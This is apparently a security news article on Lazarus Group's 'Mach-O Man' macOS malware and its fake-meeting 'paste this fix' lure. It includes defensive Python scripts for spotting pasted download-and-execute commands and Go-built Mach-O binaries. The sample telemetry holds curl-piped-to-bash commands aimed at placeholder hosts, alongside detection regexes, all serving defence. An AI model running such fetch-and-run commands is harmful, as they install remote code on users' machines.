North Korea–linked hacking outfit Lazarus Group is pushing a new native macOS malware kit security researchers call “Mach-O Man.” Lazarus built the toolkit with several Go‑based Mach-O binaries and designed it to run smoothly on modern Apple Silicon machines used by developers and executives. Researchers say the campaign focuses on high‑value corporate environments in fintech, crypto, and other finance‑adjacent sectors.
The kit is the center of an ongoing intrusion effort that seeks to obtain deep access to business systems and steal credentials, according to a technical article published by the Quetzal Team.
It collects browser sessions, tokens used to open internal tools or cloud dashboards, and passwords stored in the macOS Keychain. As a result, an attacker can gain access to trading desks through a compromised Mac.
Social Engineering Starts with “Urgent” Meeting Invites
The Mach-O Man playbook begins with social engineering instead of obvious phishing emails. Attackers send targets “urgent” invitations via apps like Telegram to a Zoom, Google Meet, or Teams call, then direct them to a fake meeting‑related website. There, the site claims there is a connection problem and tells the victim to paste a one‑line command into the macOS Terminal to “fix” it.
By running that command themselves, users install the malware and let it slip past several company security safeguards.
The kit then downloads more payloads, creates persistence, and begins silently stealing data from the device. Analysts warn that this technique may evade detection by traditional endpoint security tools, because it uses native binaries and user-initiated actions rather than conventional exploit chains.
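The detection angle that follows from the lure above is process lineage: a download-and-execute one-liner is far more suspicious when an interactive terminal application sits in its ancestry, because that is exactly what a "paste this to fix your connection" lure produces. The script below is an added example, not code from the article or from the researchers' report; it runs a few regular expressions over constructed process-exec records and ranks hits by whether a terminal app appears in the parent chain. The record fields (pid, ppid, name, cmdline) and the list of terminal app names are assumptions chosen for this example, and every host name in the sample data is a constructed .invalid placeholder.

```python
"""Flag 'paste this into Terminal' fix commands in process-event telemetry.

Constructed example (not from the article): each event is a dict shaped like
a simplified EDR / Endpoint Security process-exec record. The field names
(pid, ppid, name, cmdline) are assumptions for this example.
"""
import re

# Download-and-execute shapes that a "connection fix" one-liner typically takes.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.IGNORECASE)
DECODE_TO_SHELL = re.compile(
    r"\bbase64\b[^|]*(-d|--decode)[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.IGNORECASE)
SCRIPT_FETCH = re.compile(
    r"\b(osascript|python3?|perl|ruby)\b.*\bhttps?://", re.IGNORECASE)

# Interactive terminal apps (assumed list); a hit under one of these means a
# human most likely pasted the command, which is the lure described above.
TERMINAL_APPS = {"Terminal", "iTerm2", "Hyper", "Warp"}


def lineage(events, pid):
    """Return the chain of process names from pid up to the root, following ppid."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return chain


def classify(cmdline):
    """Return the matched pattern name, or None if the command line looks benign."""
    for label, rx in (("pipe-to-shell", PIPE_TO_SHELL),
                      ("decode-to-shell", DECODE_TO_SHELL),
                      ("script-fetch", SCRIPT_FETCH)):
        if rx.search(cmdline):
            return label
    return None


def detect(events):
    """Return findings for events whose command line matches, ranked by lineage.

    severity 'high'  : pattern matched AND a terminal app is in the ancestry
    severity 'medium': pattern matched, no terminal ancestor (build scripts,
                       CI runners and package post-install hooks also do this)
    """
    findings = []
    for e in events:
        label = classify(e["cmdline"])
        if label is None:
            continue
        chain = lineage(events, e["pid"])
        interactive = any(name in TERMINAL_APPS for name in chain)
        findings.append({
            "pid": e["pid"],
            "pattern": label,
            "severity": "high" if interactive else "medium",
            "lineage": " <- ".join(chain),
        })
    return findings


# Constructed sample telemetry: a Terminal session in which a "fix" one-liner
# was pasted, plus a benign command and a non-interactive hit for contrast.
SAMPLE_EVENTS = [
    {"pid": 1,   "ppid": 0,   "name": "launchd",  "cmdline": "/sbin/launchd"},
    {"pid": 400, "ppid": 1,   "name": "Terminal",
     "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 401, "ppid": 400, "name": "zsh",      "cmdline": "-zsh"},
    {"pid": 402, "ppid": 401, "name": "git",      "cmdline": "git pull --rebase"},
    {"pid": 403, "ppid": 401, "name": "sh",
     "cmdline": 'sh -c "curl -fsSL https://meeting-fix.example.invalid/fix.sh | bash"'},
    {"pid": 500, "ppid": 1,   "name": "xcodebuild", "cmdline": "xcodebuild -scheme App"},
    {"pid": 501, "ppid": 500, "name": "sh",
     "cmdline": 'sh -c "curl -sS https://tools.example.invalid/install | sh"'},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The regexes are deliberately loose; the value is in combining them with ancestry so that the pasted-in case surfaces as high severity while the same command line from a build tool is only medium. In a real deployment the lineage would come from the EDR's own parent-process fields rather than from a reconstructed ppid table.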
Why Crypto and Fintech Should Pay Attention
Lazarus has a long track record of targeting cryptocurrency businesses, including past AppleJeus campaigns that abused fake trading apps to compromise exchanges.
Analysts believe the group stole hundreds of millions of dollars in digital assets in earlier years through a mix of exchange hacks and supply‑chain attacks. The new Mach-O Man toolkit shows the group is still investing in macOS malware as more executives and engineers use Macs for work.
Researchers say organizations with hot‑wallet access, signing keys, or large balances face the highest risk, since stolen credentials or browser sessions could let attackers move funds, change withdrawal settings, or pivot into back‑office infrastructure without touching on-chain defenses.
Security teams in crypto, trading, and payments should lock down macOS endpoints, restrict Terminal use, and monitor for suspicious Go‑based Mach-O binaries.
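Hunting for Go-built Mach-O binaries, as the last recommendation suggests, does not require a full disassembler: the Go linker leaves a `__go_buildinfo` section in the `__DATA` segment of darwin binaries, and the build-info and build-ID marker strings are present in the file. The parser below is an added example, not code from the article or the researchers; it walks the Mach-O 64-bit header and `LC_SEGMENT_64` load commands, unwraps universal (fat) containers so both the arm64 and x86_64 slices are inspected, and reports those indicators. The sample images are constructed in memory with `struct` and are not runnable programs; treat a hit as a triage signal, since plenty of legitimate developer tooling on Macs is also written in Go.

```python
"""Triage Mach-O files for Go-built binaries (a hunting aid, not a verdict).

Added example, not from the article. Parses the Mach-O 64 header and
LC_SEGMENT_64 load commands (unwrapping fat/universal containers) and reports
two Go indicators: a __go_buildinfo section and the Go marker strings.
The sample images built by build_sample()/build_fat() are constructed.
"""
import struct
import sys

MH_MAGIC_64 = 0xFEEDFACF          # 64-bit Mach-O, little-endian on x86_64 / arm64
FAT_MAGIC = 0xCAFEBABE            # universal binary wrapper, big-endian headers
LC_SEGMENT_64 = 0x19
CPU_NAMES = {0x01000007: "x86_64", 0x0100000C: "arm64"}
GO_MARKERS = ("Go build ID:", "Go buildinf:")   # buildinfo magic is "\xff Go buildinf:"


def _parse_thin(blob):
    """Parse one 64-bit Mach-O image; return its arch and (segment, section) pairs."""
    magic, cputype, _sub, _ftype, ncmds, _sizeofcmds, _flags, _res = \
        struct.unpack_from("<8I", blob, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a 64-bit little-endian Mach-O image")
    sections, off = [], 32                      # mach_header_64 is 32 bytes
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<2I", blob, off)
        if cmd == LC_SEGMENT_64:
            nsects = struct.unpack_from("<I", blob, off + 64)[0]   # segment_command_64.nsects
            for i in range(nsects):
                sectname, segname = struct.unpack_from("16s16s", blob, off + 72 + 80 * i)
                sections.append((segname.rstrip(b"\0").decode(),
                                 sectname.rstrip(b"\0").decode()))
        off += cmdsize
    return {"arch": CPU_NAMES.get(cputype, hex(cputype)), "sections": sections}


def parse_macho(blob):
    """Return a list of parsed slices: one for a thin file, one per arch for a fat file."""
    if struct.unpack_from(">I", blob, 0)[0] == FAT_MAGIC:
        nfat = struct.unpack_from(">I", blob, 4)[0]
        slices = []
        for i in range(nfat):
            _cpu, _sub, offset, size, _align = struct.unpack_from(">5I", blob, 8 + 20 * i)
            slices.append(_parse_thin(blob[offset:offset + size]))
        return slices
    return [_parse_thin(blob)]


def go_indicators(blob):
    """Return the sorted list of Go indicators found across all slices of the file."""
    found = set()
    for sl in parse_macho(blob):
        if ("__DATA", "__go_buildinfo") in sl["sections"]:
            found.add("section:__go_buildinfo")
    for marker in GO_MARKERS:
        if marker.encode() in blob:
            found.add("string:" + marker)
    return sorted(found)


def is_go_macho(blob):
    return bool(go_indicators(blob))


def build_sample(go_built, cputype=0x0100000C):
    """Construct a minimal, non-executable Mach-O 64 image with one __DATA segment."""
    sects = [("__data", "__DATA")] + ([("__go_buildinfo", "__DATA")] if go_built else [])
    payload = (b"\xff Go buildinf:" + b"\0" * 16) if go_built else b"\0" * 32
    cmdsize = 72 + 80 * len(sects)
    data_off = 32 + cmdsize
    seg = struct.pack("<2I16s4Q2i2I", LC_SEGMENT_64, cmdsize, b"__DATA",
                      0x1000, 0x1000, data_off, len(payload), 3, 3, len(sects), 0)
    for name, segname in sects:
        seg += struct.pack("<16s16s2Q8I", name.encode(), segname.encode(),
                           0x1000, len(payload), data_off, 0, 0, 0, 0, 0, 0, 0)
    header = struct.pack("<8I", MH_MAGIC_64, cputype, 0, 2, 1, cmdsize, 0, 0)
    return header + seg + payload


def build_fat(thin_images):
    """Wrap thin images in a universal container (big-endian fat headers)."""
    header_len = 8 + 20 * len(thin_images)
    archs, body = b"", b""
    for img in thin_images:
        cputype = struct.unpack_from("<I", img, 4)[0]
        archs += struct.pack(">5I", cputype, 0, header_len + len(body), len(img), 0)
        body += img
    return struct.pack(">2I", FAT_MAGIC, len(thin_images)) + archs + body


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            data = fh.read()
        try:
            print(path, [s["arch"] for s in parse_macho(data)], go_indicators(data))
        except (ValueError, struct.error) as exc:
            print(path, "skipped:", exc)
```

Run it as `python3 triage.py /path/to/binary …` over a directory of recently written executables, or feed it files that a file-monitoring rule flags; the marker-string check catches stripped builds where the section name survives but symbols do not, and the section check catches the reverse. The 32-bit and big-endian Mach-O variants are deliberately rejected, since they do not run on Apple Silicon hosts.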